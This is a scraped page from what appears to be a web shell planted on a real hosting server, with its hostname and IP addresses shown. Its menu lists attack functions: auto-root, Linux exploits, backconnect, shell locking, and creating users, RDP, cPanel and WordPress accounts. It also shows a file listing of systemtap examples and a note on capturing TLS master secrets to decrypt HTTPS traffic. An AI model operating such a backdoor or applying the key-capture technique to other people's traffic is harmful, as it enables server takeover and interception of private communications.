Linux vps-4302913.novaexata.com.br 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
io /
[ HOME SHELL ]
Name
Size
Permission
Action
capture_ssl_master_secrets.met...
664
B
-rw-r--r--
capture_ssl_master_secrets.stp
1.06
KB
-rwxr-xr-x
capture_ssl_master_secrets.txt
1.86
KB
-rw-r--r--
deviceseeks.meta
490
B
-rw-r--r--
deviceseeks.stp
884
B
-rwxr-xr-x
deviceseeks.txt
5.27
KB
-rw-r--r--
disktop.meta
381
B
-rw-r--r--
disktop.stp
1.75
KB
-rwxr-xr-x
eatmydata.meta
337
B
-rw-r--r--
eatmydata.stp
1.16
KB
-rwxr-xr-x
eatmydata.txt
304
B
-rw-r--r--
enospc.meta
332
B
-rw-r--r--
enospc.stp
2.18
KB
-rwxr-xr-x
inodewatch.meta
475
B
-rw-r--r--
inodewatch.stp
245
B
-rwxr-xr-x
inodewatch2.meta
504
B
-rw-r--r--
inodewatch2.stp
457
B
-rwxr-xr-x
io_submit.meta
508
B
-rw-r--r--
io_submit.stp
1.86
KB
-rwxr-xr-x
io_submit.tcl
140
B
-rw-r--r--
ioblktime.meta
769
B
-rw-r--r--
ioblktime.stp
788
B
-rwxr-xr-x
iodevstats.meta
738
B
-rw-r--r--
iodevstats.stp
1.12
KB
-rwxr-xr-x
iodevstats.txt
528
B
-rw-r--r--
iostat-scsi.meta
608
B
-rw-r--r--
iostat-scsi.stp
3.41
KB
-rwxr-xr-x
iostat-scsi.txt
481
B
-rw-r--r--
iostats.meta
671
B
-rw-r--r--
iostats.stp
1.12
KB
-rwxr-xr-x
iostats.txt
361
B
-rw-r--r--
iotime.meta
1
KB
-rw-r--r--
iotime.stp
2.83
KB
-rwxr-xr-x
iotop.meta
410
B
-rw-r--r--
iotop.stp
656
B
-rwxr-xr-x
mbrwatch.meta
559
B
-rw-r--r--
mbrwatch.stp
234
B
-rwxr-xr-x
mbrwatch.tcl
140
B
-rw-r--r--
mbrwatch.txt
788
B
-rw-r--r--
nfs_func_users.meta
665
B
-rw-r--r--
nfs_func_users.stp
341
B
-rwxr-xr-x
slowvfs.meta
426
B
-rw-r--r--
slowvfs.stp
281
B
-rwxr-xr-x
switchfile.meta
330
B
-rw-r--r--
switchfile.stp
231
B
-rw-r--r--
traceio.meta
403
B
-rw-r--r--
traceio.stp
1.35
KB
-rwxr-xr-x
traceio2.meta
400
B
-rw-r--r--
traceio2.stp
494
B
-rwxr-xr-x
ttyspy.meta
521
B
-rw-r--r--
ttyspy.stp
1.64
KB
-rwxr-xr-x
ttyspy.txt
455
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : capture_ssl_master_secrets.txt
Capture SSL/TLS master secrets from gnutls and openssl users The following usage example has been tested to work on Debian 9: $ sudo stap-prep $ sudo apt-get install libgnutls30-dbgsym libssl1.0.2-dbgsym libssl1.1-dbgsym libssl-dev $ ./capture_ssl_master_secrets.stp | tee keylog.txt & $ sudo tcpdump -s0 -w traffic.pcap -U port 443 & $ curl https://www.ssllabs.com/curl_secret $ wget https://www.ssllabs.com/wget_secret $ echo "GET /sclient_secret HTTP/1.1\nHost: www.ssllabs.com\n\n" | openssl s_client -connect www.ssllabs.com:443 -servername www.ssllabs.com $ cat keylog.txt # 1509378583063892 process("/usr/lib/x86_64-linux-gnu/libssl.so.1.0.2").function("tls1_generate_master_secret@./ssl/t1_enc.c:1134").return curl (24745) CLIENT_RANDOM 924207933a2eda5d90ccd2552a620924c6cd12bf72036ced2227bfc0016152ad 9bffacb095403182e9a2f515851d3fa49838b93599de6507230bac0c0666c29d140588739635d4ad19bdfd4fced69000 # 1509378587558501 process("/usr/lib/x86_64-linux-gnu/libgnutls.so.30.13.1").function("generate_normal_master@./lib/kx.c:131").return wget (24755) CLIENT_RANDOM 59f74aa0d72f90753e989d049953deb9fc6479a2c7091936520d280a4b1be28a 5604af95f156eaa21a93f6982c1de24289b86dac9331e0080bfc4b1a67ab13535f03c7d50530e5b3f8cd572b5d8967c8 # 1509378592611222 process("/usr/lib/x86_64-linux-gnu/libssl.so.1.1").function("tls1_generate_master_secret@../ssl/t1_enc.c:463").return openssl (24757) CLIENT_RANDOM aa211423644611d7b52f254e44e55c3919a48d81cc0a7f0c6af604190720fc93 74150d7854157f7e6b01e40238641d065c37d7f931bac6a14aa9fac6a44b1ea7da0943f15714039acc3f71077c21127a $ tshark -o ssl.keylog_file:keylog.txt -d tcp.port==443,ssl -x -r traffic.pcap -V | grep -A1 'Decrypted SSL data' |grep "GET " 0000 47 45 54 20 2f 63 75 72 6c 5f 73 65 63 72 65 74 GET /curl_secret 0000 47 45 54 20 2f 77 67 65 74 5f 73 65 63 72 65 74 GET /wget_secret 0000 47 45 54 20 2f 73 63 6c 69 65 6e 74 5f 73 65 63 GET /sclient_sec
Close